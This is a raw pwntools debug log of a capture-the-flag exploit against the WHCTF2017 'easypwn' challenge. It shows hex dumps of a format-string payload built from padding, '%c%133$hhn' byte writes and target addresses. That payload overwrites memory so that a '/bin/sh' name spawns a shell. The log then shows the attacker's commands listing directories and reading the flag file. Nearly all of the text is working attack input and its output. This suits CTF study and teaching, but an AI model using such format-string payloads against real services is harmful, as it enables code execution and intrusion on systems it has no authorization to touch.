00000000 59 6f 75 72 20 49 6e 70 75 74 20 49 73 20 3a 61 │Your│ Inp│ut I│s :a│
00000010 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 │aaaa│aaaa│aaaa│aaaa│
*
000003f0 61 61 61 61 61 61 61 62 62 25 36 39 63 25 31 33 │aaaa│aaab│b%69│c%13│
00000400 33 24 68 68 6e 41 41 19 c0 e1 a5 e0 55 20 20 20 │3$hh│nAA·│····│U │
00000410 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 │ │ │ │ │
*
00000450 20 0a 49 6e 70 75 74 20 59 6f 75 72 20 43 6f 64 │ ·In│put │Your│ Cod│
00000460 65 3a 0a │e:·│
00000463
[DEBUG] Sent 0x2 bytes:
b'1\n'
[DEBUG] Received 0x15 bytes:
b'Welcome To WHCTF2017:'
[DEBUG] Sent 0x401 bytes:
00000000 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 │aaaa│aaaa│aaaa│aaaa│
*
000003e0 61 61 61 61 61 61 61 61 62 62 25 36 36 63 25 31 │aaaa│aaaa│bb%6│6c%1│
000003f0 33 33 24 68 68 6e 41 41 1a c0 e1 a5 e0 55 00 00 │33$h│hnAA│····│·U··│
00000400 0a │·│
00000401
[DEBUG] Received 0x1 bytes:
b'\n'
[DEBUG] Received 0x460 bytes:
00000000 59 6f 75 72 20 49 6e 70 75 74 20 49 73 20 3a 61 │Your│ Inp│ut I│s :a│
00000010 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 │aaaa│aaaa│aaaa│aaaa│
*
000003f0 61 61 61 61 61 61 61 62 62 25 36 36 63 25 31 33 │aaaa│aaab│b%66│c%13│
00000400 33 24 68 68 6e 41 41 1a c0 e1 a5 e0 55 20 20 20 │3$hh│nAA·│····│U │
00000410 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 │ │ │ │ │
*
00000440 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 49 │ │ │ │ ·I│
00000450 6e 70 75 74 20 59 6f 75 72 20 43 6f 64 65 3a 0a │nput│ You│r Co│de:·│
00000460
[DEBUG] Sent 0x2 bytes:
b'2\n'
[DEBUG] Received 0x11 bytes:
b'Input Your Name:\n'
[DEBUG] Sent 0x8 bytes:
b'/bin/sh\n'
[*] Switching to interactive mode
[DEBUG] Received 0x21 bytes:
b'OK!I Know Your Name :/bin/sh\n'
b'Now!'
OK!I Know Your Name :/bin/sh
Now!$ ls
[DEBUG] Sent 0x3 bytes:
b'ls\n'
[DEBUG] Received 0x64 bytes:
b'bin\n'
b'boot\n'
b'dev\n'
b'etc\n'
b'home\n'
b'lib\n'
b'lib32\n'
b'lib64\n'
b'media\n'
b'mnt\n'
b'opt\n'
b'proc\n'
b'root\n'
b'run\n'
b'sbin\n'
b'srv\n'
b'start.sh\n'
b'sys\n'
b'tmp\n'
b'usr\n'
b'var\n'
bin
boot
dev
etc
home
lib
lib32
lib64
media
mnt
opt
proc
root
run
sbin
srv
start.sh
sys
tmp
usr
var
$ cat flag
[DEBUG] Sent 0x9 bytes:
b'cat flag\n'
[DEBUG] Received 0x5 bytes:
b'cat: '
cat: [DEBUG] Received 0x20 bytes:
b'flag: No such file or directory\n'
flag: No such file or directory
$ cd home
[DEBUG] Sent 0x8 bytes:
b'cd home\n'
$ ls
[DEBUG] Sent 0x3 bytes:
b'ls\n'
[DEBUG] Received 0x5 bytes:
b'xctf\n'
xctf
$ cd xctf
[DEBUG] Sent 0x8 bytes:
b'cd xctf\n'
$ ls
[DEBUG] Sent 0x3 bytes:
b'ls\n'
[DEBUG] Received 0x25 bytes:
b'bin\n'
b'dev\n'
b'easypwn\n'
b'flag\n'
b'lib\n'
b'lib32\n'
b'lib64\n'
bin
dev
easypwn
flag
lib
lib32
lib64
$ cat flag
[DEBUG] Sent 0x9 bytes:
b'cat flag\n'
[DEBUG] Received 0x2d bytes:
b'cyberpeace{************************c97f2888818ecf}\n'
cyberpeace{************************c97f2888818ecf}